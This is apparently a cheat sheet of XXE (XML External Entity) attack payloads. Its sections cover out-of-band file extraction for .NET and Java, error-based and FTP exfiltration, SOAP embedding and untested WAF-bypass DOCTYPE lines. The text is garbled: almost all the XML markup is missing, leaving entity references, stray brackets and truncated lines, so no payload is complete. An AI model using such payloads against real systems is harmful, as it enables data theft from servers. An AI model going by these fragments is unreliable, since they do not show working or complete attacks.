XXE Payload
]>
OoB extraction
%sp;
%param1;
]>
## External dtd: ##
">
OoB variation of above (seems to work better against .NET)
%sp;
%param1;
%exfil;
]>
## External dtd: ##
">
OoB extraction
%sp;
%param3;
%exfil;
]>
## External dtd: ##
">
OoB extraction via error message (Java)
%sp;
%param3;
%exfil;
]>
## External dtd: ##
'> %param1; %external;
OoB extraction, alternative variant
">
%dtd;
]>
## External dtd: ##
File-not-found exception-based extraction
%one;
%two;
%four;
]>
## External dtd: ##
">
OoB extraction over FTP
%asd;
%c;
]>
&rrr;
## External dtd: ##
">
Inside SOAP body
<soap:Body>
%dtd;]>
</soap:Body>
---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :-: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"
